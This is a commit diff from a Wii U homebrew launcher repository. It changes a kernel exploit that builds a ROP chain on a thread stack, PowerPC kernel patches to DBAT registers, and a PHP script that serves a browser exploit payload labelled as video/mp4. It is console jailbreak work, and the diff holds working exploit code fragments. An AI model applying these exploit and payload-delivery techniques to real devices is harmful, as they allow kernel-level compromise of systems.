The-Homebrew-Cloud/homebrew_launcher
2
0
Fork 0
mirror of https://github.com/wiiu-env/homebrew_launcher.git synced 2025-02-20 06:12:41 +01:00
Code Issues Packages Projects Releases Wiki Activity

code i forgot to commit in may (haha)

Browse Source
This commit is contained in:
dimok789 2016-10-12 19:24:22 +02:00
parent 0baf7cfa05
commit e33c9894f1
6 changed files with 49 additions and 41 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
installer/Makefile
View File

@ -69,6 +69,7 @@ main: sd_loader.h
clean: clean:
rm -rf $(build) rm -rf $(build)
rm -rf sd_loader.h rm -rf sd_loader.h
make clean -C ../sd_loader
print_stats: print_stats:
@echo @echo

23
installer/kernel_patches.S
View File

@ -128,28 +128,15 @@ SC_0x25_KernelCopyData:
.globl Syscall_0x36 .globl Syscall_0x36
Syscall_0x36: Syscall_0x36:
mflr r0
stwu r1, -0x10(r1)
stw r30, 0x4(r1)
stw r31, 0x8(r1)
mr r5, r0
mr r6, r1
li r0, 0x3600 li r0, 0x3600
sc sc
nop
mr r0, r5
mr r1, r6
lwz r30, 0x04(r1)
lwz r31, 0x08(r1)
addi r1, r1, 0x10
mtlr r0
blr blr
.globl KernelPatches .globl KernelPatches
KernelPatches: KernelPatches:
# store the old DBAT0 # store the old DBAT0
mfdbatu r30, 0 mfdbatu r5, 0
mfdbatl r31, 0 mfdbatl r6, 0
# memory barrier # memory barrier
eieio eieio
@ -284,12 +271,12 @@ KernelPatches:
isync isync
# restore DBAT 0 and return from interrupt # restore DBAT 0 and return from interrupt
mtdbatu 0, r30 mtdbatu 0, r5
mtdbatl 0, r31 mtdbatl 0, r6
# memory barrier # memory barrier
eieio eieio
isync isync
rfi blr

27
installer/kexploit.c
View File

@ -21,7 +21,7 @@ void run_kexploit(private_data_t *private_data)
/* Exit functions */ /* Exit functions */
void (*__PPCExit)(); void (*__PPCExit)();
void (*_Exit)(); void (*_Exit)(int);
OSDynLoad_FindExport(coreinit_handle, 0, "__PPCExit", &__PPCExit); OSDynLoad_FindExport(coreinit_handle, 0, "__PPCExit", &__PPCExit);
OSDynLoad_FindExport(coreinit_handle, 0, "_Exit", &_Exit); OSDynLoad_FindExport(coreinit_handle, 0, "_Exit", &_Exit);
@ -40,14 +40,17 @@ void run_kexploit(private_data_t *private_data)
OSDynLoad_FindExport(coreinit_handle, 0, "OSFreeToSystem", &OSFreeToSystem); OSDynLoad_FindExport(coreinit_handle, 0, "OSFreeToSystem", &OSFreeToSystem);
/* OS thread functions */ /* OS thread functions */
bool (*OSCreateThread)(void *thread, void *entry, int argc, void *args, uint32_t *stack, uint32_t stack_size, int priority, uint16_t attr); bool (*OSCreateThread)(void *thread, void *entry, int argc, void *args, uint32_t stack, uint32_t stack_size, int priority, uint16_t attr);
int (*OSResumeThread)(void *thread); int (*OSResumeThread)(void *thread);
void (*OSExitThread)(); void (*OSExitThread)();
int (*OSIsThreadTerminated)(void *thread); int (*OSIsThreadTerminated)(void *thread);
void (*OSYieldThread)(void);
OSDynLoad_FindExport(coreinit_handle, 0, "OSCreateThread", &OSCreateThread); OSDynLoad_FindExport(coreinit_handle, 0, "OSCreateThread", &OSCreateThread);
OSDynLoad_FindExport(coreinit_handle, 0, "OSResumeThread", &OSResumeThread); OSDynLoad_FindExport(coreinit_handle, 0, "OSResumeThread", &OSResumeThread);
OSDynLoad_FindExport(coreinit_handle, 0, "OSExitThread", &OSExitThread); OSDynLoad_FindExport(coreinit_handle, 0, "OSExitThread", &OSExitThread);
OSDynLoad_FindExport(coreinit_handle, 0, "OSIsThreadTerminated", &OSIsThreadTerminated); OSDynLoad_FindExport(coreinit_handle, 0, "OSIsThreadTerminated", &OSIsThreadTerminated);
OSDynLoad_FindExport(coreinit_handle, 0, "OSYieldThread", &OSYieldThread);
/* OSDriver functions */ /* OSDriver functions */
uint32_t reg[] = {0x38003200, 0x44000002, 0x4E800020}; uint32_t reg[] = {0x38003200, 0x44000002, 0x4E800020};
@ -89,9 +92,9 @@ void run_kexploit(private_data_t *private_data)
uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET; uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET;
/* Make a thread to modify the semaphore */ /* Make a thread to modify the semaphore */
OSContext *thread = (OSContext*)private_data->MEMAllocFromDefaultHeapEx(0x1000,8); OSContext *thread = (OSContext*)private_data->MEMAllocFromDefaultHeapEx(0x1000, 8);
uint32_t *stack = (uint32_t*)private_data->MEMAllocFromDefaultHeapEx(0xa0,0x20); uint32_t *stack = (uint32_t*)private_data->MEMAllocFromDefaultHeapEx(0xA0, 0x20);
if (!OSCreateThread(thread, (void*)0x11a1dd8, 0, NULL, stack + 0x28, 0xa0, 0, 0x1 | 0x8)) OSFatal("Failed to create thread"); if (!OSCreateThread(thread, (void*)0x11a1dd8, 0, NULL, ((uint32_t)stack) + 0xA0, 0xA0, 0, 0x1 | 0x8)) OSFatal("Failed to create thread");
/* Set up the ROP chain */ /* Set up the ROP chain */
thread->gpr[1] = (uint32_t)stack; thread->gpr[1] = (uint32_t)stack;
@ -117,22 +120,16 @@ void run_kexploit(private_data_t *private_data)
stack[0x94/4] = (uint32_t)OSExitThread; stack[0x94/4] = (uint32_t)OSExitThread;
DCFlushRange(thread, 0x1000);
DCFlushRange(stack, 0x1000);
/* Start the thread */ /* Start the thread */
OSResumeThread(thread); OSResumeThread(thread);
/* Wait for a while */ /* Wait for a while */
while(OSIsThreadTerminated(thread) == 0) while(OSIsThreadTerminated(thread) == 0)
{ {
asm volatile ( OSYieldThread();
" nop\n"
" nop\n"
" nop\n"
" nop\n"
" nop\n"
" nop\n"
" nop\n"
" nop\n"
);
} }
/* Free stuff */ /* Free stuff */

12
installer/launcher.c
View File

@ -111,14 +111,14 @@ void __main(void)
/* Get our memory functions */ /* Get our memory functions */
unsigned int* functionPointer; unsigned int* functionPointer;
void* (*memset)(void * dest, unsigned int value, unsigned int bytes); void* (*p_memset)(void * dest, unsigned int value, unsigned int bytes);
OSDynLoad_FindExport(coreinit_handle, 0, "memset", &memset); OSDynLoad_FindExport(coreinit_handle, 0, "memset", &p_memset);
private_data_t private_data; private_data_t private_data;
memset(&private_data, 0, sizeof(private_data_t)); p_memset(&private_data, 0, sizeof(private_data_t));
private_data.coreinit_handle = coreinit_handle; private_data.coreinit_handle = coreinit_handle;
private_data.memset = memset; private_data.memset = p_memset;
private_data.data_elf = (unsigned char *) ___sd_loader_sd_loader_elf; // use this address as temporary to load the elf private_data.data_elf = (unsigned char *) ___sd_loader_sd_loader_elf; // use this address as temporary to load the elf
OSDynLoad_FindExport(coreinit_handle, 1, "MEMAllocFromDefaultHeapEx", &functionPointer); OSDynLoad_FindExport(coreinit_handle, 1, "MEMAllocFromDefaultHeapEx", &functionPointer);
@ -234,7 +234,7 @@ void __main(void)
private_data.MEMFreeToDefaultHeap(stack); private_data.MEMFreeToDefaultHeap(stack);
//! we are done -> exit browser now //! we are done -> exit browser now
private_data._Exit(); private_data._Exit(0);
} }
void ExitFailure(private_data_t *private_data, const char *failure) void ExitFailure(private_data_t *private_data, const char *failure)
@ -287,7 +287,7 @@ void ExitFailure(private_data_t *private_data, const char *failure)
unsigned int t1 = 0x3FFFFFFF; unsigned int t1 = 0x3FFFFFFF;
while(t1--) asm volatile("nop"); while(t1--) asm volatile("nop");
private_data->_Exit(); private_data->_Exit(0);
} }
/* ***************************************************************************** /* *****************************************************************************

2
installer/structs.h
View File

@ -19,7 +19,7 @@ typedef struct {
void (*MEMFreeToDefaultHeap)(void *ptr); void (*MEMFreeToDefaultHeap)(void *ptr);
void (*DCFlushRange)(const void *addr, unsigned int length); void (*DCFlushRange)(const void *addr, unsigned int length);
void (*ICInvalidateRange)(const void *addr, unsigned int length); void (*ICInvalidateRange)(const void *addr, unsigned int length);
void (*_Exit)(void); void (*_Exit)(int);
void* (*curl_easy_init)(void); void* (*curl_easy_init)(void);
void (*curl_easy_setopt)(void *handle, unsigned int param, const void *op); void (*curl_easy_setopt)(void *handle, unsigned int param, const void *op);

25
www/homebrew_launcher/payload.php
View File

@ -136,8 +136,31 @@ for($i=0; $i<0x2000; $i+=4)//Old stuff, probably should be removed(testing is re
$con.= pack("N*", 0x8495a6b4); $con.= pack("N*", 0x8495a6b4);
} }
header('HTTP/1.0 200 OK');
header("Content-Type: video/mp4"); header("Content-Type: video/mp4");
header('Accept-Ranges: bytes');
header('Content-Length: '.strlen($con));
header("Content-Transfer-Encoding: binary\n");
header('Connection: close');
// thanks to http://loadiine.ovh for finding this out
// At this exact moment, WiiU is loading its video player according to "Content-Type: video/mp4"
// When loaded too quickly, the video player can still freeze. So let's leave him 1 second to pop-up
sleep(1);
//echo $con;
do
{
$sub = substr($con, 0, 1024*16);
$con = substr($con, 1024*16);
echo $sub;
usleep(1000);
$len = strlen($con);
}
while($len > 0);
echo $con;
?> ?>